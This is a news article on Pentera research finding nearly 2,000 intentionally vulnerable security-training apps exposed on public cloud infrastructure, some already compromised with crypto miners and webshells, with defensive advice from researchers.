Hackers are exploiting intentionally vulnerable penetration testing and security training apps that have been mistakenly exposed to the public internet, giving them access to cloud environments including CloudFlare, F5, and Palo Alto Networks.
New research from offensive security research firm Pentera focuses on ten popular training tools, including Damn Vulnerable Web Application (DVWA), OWASP Juice Shop, Hackazon, and bWAPP.
All these tools are designed to contain weaknesses for education purposes, as well as internal pentesting and product demonstrations. However, when these applications are deployed in real cloud environments with privileged permissions, they can become an easy entry point for attackers.
Pentera warned that the flaws can give threat actors control of the compromised networks and “pathways for lateral movement into sensitive internal systems,” especially when companies violate the “principle of least privilege” or fail to properly sandbox test systems.
Nearly 2,000 exposed training apps found online
Pentera said it found “clear evidence that attackers are exploiting these flaws in the wild – to deploy crypto miners, plant webshells or pivot to sensitive systems.”
Researchers identified 1,926 exposed vulnerability applications on the public web, often deployed on AWS, Google Cloud Platform, and Microsoft Azure, with overly privileged IAM (Identity and Access Management) roles.
Of the total, 1,626 unique servers were verified, and nearly 60% were running on enterprise-owned infrastructure in these major cloud platforms.
The discovery, documented in a security report, began during a routine cloud security assessment, when Noam Yaffe, a senior security researcher at Pentera, spotted an exposed Hackazon instance running directly in production.
This made him question “how many other vulnerable training applications are publicly exposed, and how can an attacker exploit them?”
He then examined 10 widely used training apps, many of which had known remote code execution paths.
“To assess the risk beyond surface exposure, I built a Python tool to automate exploitation using known vectors to achieve remote code execution,” Yaffe said.
Pentera said the results were “alarming,” with 109 exposed credential sets uncovered, many tied to overprivileged identities.
In some cases, Yaffe said he found cloud access that could enable the reading and writing of sensitive data, interaction with container registries, deployment or destruction of compute resources, and even administrator-level cloud access.
“In multiple cases, we found active secrets (GitHub tokens, Slack keys, Docker Hub creds), proprietary source code, and real user data.”
“What began as a harmless lab could lead directly to an organization’s crown jewels.”
Noam Yaffe, senior security researcher, Pentera
To scale the hunt, Yaffe built an open-source tool called SigInt, which he describes as “a Python-based autonomous reconnaissance framework that uses LLMs to intelligently fingerprint applications and discover their exposed instances across the internet.”
He said the tool helped the research expand to thousands of deployments.
The results led him to discover that some of the exposed applications were linked to major tech firms, including Cloudflare, F5, and Palo Alto Networks. The companies received the findings and have fixed the issues, according to the researchers.
In-the-wild usage detected
The research also found signs of real-world exploitation already underway.
“Out of the 616 discovered DVWA instances, around 20% were found to contain artifacts deployed by malicious actors. These weren’t isolated incidents; they represented an organized, ongoing exploitation campaign,” Yaffe said.
The artifacts included an XMRig cryptocurrency miner, a persistence script designed to maintain access, and a PHP webshell used to run commands and steal credentials.
Yaffe said exposed training apps are likely being abused for crypto-mining, persistent access, lateral movement, and data theft, warning that "Organized threat actors have recognized this attack surface and are systematically exploiting it.”
Pentera urged organizations to treat training environments as real attack surfaces by maintaining a complete inventory of cloud resources, applying least-privilege permissions, isolating test environments from production networks, and scanning for exposed services using tools attackers rely on.
Commenting on the findings, Nivedita Murthy, a senior security consultant at Black Duck, added that training apps like DVWA and OWASP Juice Shop are widely used because they are free and effective for teaching secure coding and pentesting, but that oversight is limited.
“There is limited oversight of these applications, as any tests conducted on them could reveal vulnerabilities that teams may assume are intentional rather than malicious.”
Nivedita Murthy, senior security consultant, Black Duck
She recommended that companies track which versions are deployed, keep verified versions internally rather than relying on ad-hoc downloads, confirm that discovered vulnerabilities are documented by tool creators, and run the apps only in isolated environments to mitigate the impact of any compromise.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked